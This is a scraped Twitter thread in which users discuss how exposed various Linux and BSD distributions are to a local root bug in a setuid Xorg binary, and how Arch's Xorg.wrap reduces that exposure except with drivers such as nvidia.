23
974
1,333
Conversation
Replying to
To be fair, Xorg needs to be setuid for this to work, which it hasn't been for a while on most end-user distros. Servers distros, like redhat/centos, is a different story.
1
2
21
You’re unable to view this Tweet because this account owner limits who can view their Tweets. Learn more
It's setuid root on the proactive secure and many others.. looks like a great disturbance in the force is afoot this is a 2second local root type of attack... with pretty stable results.
1
3
On Arch, the /usr/lib/Xorg.wrap binary is setuid but it drops its privileges before calling execv on /usr/lib/Xorg (where the bug resides) and pass file descriptors so that it can do its job unprivileged. Problem completely mitigated unless you modify /etc/X11/Xwrapper.config.
2
10
25
It drops privileges in a supported environment including systemd-logind for handing out input device access and a driver supporting this. For example, it won't drop root with the nvidia driver.